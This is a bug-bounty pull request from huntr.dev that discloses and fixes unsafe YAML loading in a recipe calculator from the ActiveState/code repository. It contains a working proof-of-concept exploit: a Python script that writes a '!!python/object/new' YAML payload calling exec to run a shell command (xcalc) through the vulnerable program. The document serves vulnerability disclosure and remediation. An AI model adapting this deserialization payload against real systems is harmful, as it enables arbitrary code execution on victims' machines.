FIX Arbitrary Code Execution in Activestate Code

[b1nslashsh]

📊 Metadata *

Bounty URL: https://www.huntr.dev/bounties/1-other-code/

⚙️ Description *

Vulnerable to YAML deserialization attack caused by unsafe loading.

💻 Technical Description *

Fixed by avoiding unsafe loader.

🐛 Proof of Concept (PoC) *

Create the following PoC file:
exploit.py

# exploit.py
# this exploit is for simple recipe calculator in ActiveState/code repository
import os
os.system('git clone https://github.com/ActiveState/code.git')
os.chdir('code/recipes/Python/93379_Recipe_Calculator/')
exploit = """!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
"""
os.system('rm exp.yml')
open('exp.yml','w+').write(exploit)
os.system('python pyfood.py --yml-food=exp.yml --yml-recipe=exp.yml')
os.system('rm exp.yml')

Execute the commands in another terminal:

python exploit.py

xcalc will pop up.

🔥 Proof of Fix (PoF) *

before FIX :

After FIX :

👍 User Acceptance Testing (UAT)

After fix functionality is unaffected.

🔗 Relates to...

https://www.huntr.dev/bounties/1-other-code/

[huntr-helper]

👋 Hello, @rawktron - @b1nslashsh has opened a PR to us with a fix for a potential vulnerability in your repository. To view the vulnerability, please refer to the bounty URL in the first comment, above.

Ultimately, you get to decide if the fix is 👍 or 👎. If you are happy with the fix, please write a new comment (@huntr-helper - LGTM) and we will open a PR to your repository with the fix. All remaining PRs for this vulnerability will be automatically closed.

If you have any questions or need support, come and join us on our community Discord!

@rawktron & @b1nslashsh - thank you for your efforts in securing the world’s open source code! 🎉

[b1nslashsh]

@rawktron hey what you think ?